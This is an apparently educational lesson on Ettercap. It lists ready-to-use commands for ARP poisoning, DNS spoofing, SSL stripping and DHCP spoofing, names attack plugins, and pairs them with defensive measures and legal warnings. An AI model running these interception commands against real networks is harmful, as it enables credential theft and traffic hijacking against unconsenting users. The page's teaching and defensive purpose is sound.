Ettercap
Comprehensive Suite for Man-in-the-Middle Attacks
CRITICAL WARNING: Ettercap is for authorized security testing only. Unauthorized use violates computer crime laws. Only use on networks you own or have explicit written permission to test. These techniques can cause network disruption and data interception.
Interactive Ettercap Command Builder
Primary wired network interface
Intercept traffic between two hosts
Sniff on single network segment
ettercap -T -i eth0 -T -M arp:remote /192.168.1.1// /192.168.1.100//HIGH RISKWhat is Ettercap?
Multi-Platform Network Security Tool
Ettercap is a comprehensive suite for man-in-the-middle attacks on LANs. It provides:
- Active Sniffing: Intercept traffic on switched networks
- Protocol Analysis: Support for many protocols and real-time decoding
- Password Collection: Automatic credential harvesting
- Content Filtering: On-the-fly packet manipulation
- Plugin Architecture: Extensible attack framework
Key Capabilities
Protocol Support:
HTTP, HTTPS, SSH, FTP, POP, IMAP, SMB, LDAP, MySQL, PostgreSQL
HTTP, HTTPS, SSH, FTP, POP, IMAP, SMB, LDAP, MySQL, PostgreSQL
Attack Vectors:
ARP poisoning, DNS spoofing, DHCP spoofing, Port stealing, SSL stripping
ARP poisoning, DNS spoofing, DHCP spoofing, Port stealing, SSL stripping
Password Collection:
Automatic extraction of usernames and passwords from protocols
Automatic extraction of usernames and passwords from protocols
Educational Purpose:
This lesson is for understanding attack vectors to better defend against them. Always obtain proper authorization before testing.
Common Attack Scenarios
Man-in-the-Middle Attack
High Riskettercap -T -M arp:remote -i eth0 /192.168.1.1// /192.168.1.100//Position between gateway and target to intercept traffic
Network-wide ARP Poisoning
Critical Riskettercap -T -M arp:remote -i eth0 /192.168.1.0/24//Poison entire subnet to intercept all traffic
DNS Hijacking Attack
High Riskettercap -T -M arp:remote -P dns_spoof -i eth0 /192.168.1.1// //Redirect DNS queries to controlled servers
HTTPS Downgrade Attack
High Riskettercap -T -M arp:remote -P sslstrip -i eth0 /192.168.1.1// //Strip SSL/TLS encryption from web traffic
Essential Ettercap Commands
| Command | Description | Risk Level | Use Case |
|---|---|---|---|
ettercap -T -L | List available network interfaces | Safe | Interface discovery |
ettercap -T -P list | List all available plugins | Safe | Plugin discovery |
ettercap -T -i eth0 | Passive sniffing on interface | Medium | Network monitoring |
ettercap -T -M arp:remote /target1// /target2// | ARP poisoning between two targets | High | MITM attack |
ettercap -T -M dhcp:192.168.1.1/24/192.168.1.1 | DHCP spoofing attack | Critical | Network takeover |
ettercap -T -P dns_spoof -M arp:remote // | DNS spoofing with ARP poisoning | High | DNS hijacking |
Ettercap Plugin System
Ettercap's plugin architecture allows for extensible attack capabilities. Here are some key plugins:
Attack Plugins
dns_spoof
DNS spoofing attacks
AttackDNS spoofing attacks
sslstrip
SSL/TLS stripping
AttackSSL/TLS stripping
dos_attack
Denial of service attacks
AttackDenial of service attacks
fraggle_attack
UDP fraggle attack
AttackUDP fraggle attack
Analysis & Discovery
autoadd
Automatically add new hosts
DiscoveryAutomatically add new hosts
chk_poison
Check ARP poisoning effectiveness
AnalysisCheck ARP poisoning effectiveness
finger
OS fingerprinting
DiscoveryOS fingerprinting
gre_relay
GRE tunnel relay
TunnelingGRE tunnel relay
Using Plugins:
ettercap -T -P plugin_name -M attack_mode //target1// //target2//Defensive Measures Against MITM Attacks
Understanding Ettercap attacks helps implement proper defenses:
| Defensive Measure | Description | Effectiveness | Implementation |
|---|---|---|---|
| Static ARP Tables | Configure static ARP entries to prevent ARP poisoning | High | Network Configuration |
| ARP Monitoring | Monitor for suspicious ARP traffic and MAC address changes | High | Network Monitoring |
| Network Segmentation | Isolate critical systems using VLANs and subnets | Medium | Network Architecture |
| Switch Port Security | Enable port security features on managed switches | High | Switch Configuration |
| HTTPS Enforcement | Use HSTS and certificate pinning to prevent SSL stripping | High | Web Security |
| DNS Security | Implement DNS over HTTPS (DoH) or DNS over TLS (DoT) | High | DNS Configuration |
Layered Defense Strategy:
- Network Level: Switch security features, VLANs, network segmentation
- Protocol Level: TLS/SSL enforcement, certificate validation, DNSSEC
- Application Level: HSTS, certificate pinning, secure authentication
- Monitoring Level: Network anomaly detection, ARP table monitoring
Legal and Ethical Considerations
⚖️ Legal Requirements
- Written Authorization: Always obtain explicit written permission
- Scope Definition: Clearly define what systems are in scope
- Data Protection: Follow privacy laws (GDPR, HIPAA, etc.)
- Incident Response: Have procedures for accidental data exposure
- Documentation: Maintain detailed logs of all testing activities
Criminal Penalties
Unauthorized network interception can result in:
- Federal computer crime charges
- Wiretapping and eavesdropping violations
- Civil liability for damages
- Professional license revocation
🛡️ Ethical Guidelines
- Principle of Least Harm: Minimize network disruption
- Data Minimization: Collect only necessary information
- Confidentiality: Protect all captured sensitive data
- Transparency: Report findings responsibly
- Education Focus: Use knowledge to improve security
Legitimate Use Cases
- Penetration Testing: Authorized security assessments
- Red Team Exercises: Simulated attack scenarios
- Network Forensics: Incident response and investigation
- Security Research: Academic and professional research
- Defense Training: Understanding attack methods
Knowledge Check
Answer: Unified sniffing (-T) operates on a single network segment and is suitable for most scenarios including switched networks. Bridged sniffing (-B) requires two network interfaces and acts as a transparent bridge between network segments, useful for intercepting traffic between different network segments.
Answer: ARP poisoning works by sending fake ARP responses that associate the attacker's MAC address with the IP address of the gateway or target host. This causes victims to send their traffic to the attacker instead of the legitimate destination, allowing interception and analysis of the traffic before forwarding it to the real destination.
Answer: Key defenses include: (1) Static ARP tables to prevent ARP poisoning, (2) Switch port security features, (3) Network segmentation with VLANs, (4) ARP monitoring and anomaly detection, (5) HTTPS enforcement with HSTS, (6) Certificate pinning to prevent SSL stripping, and (7) DNS over HTTPS/TLS to prevent DNS spoofing.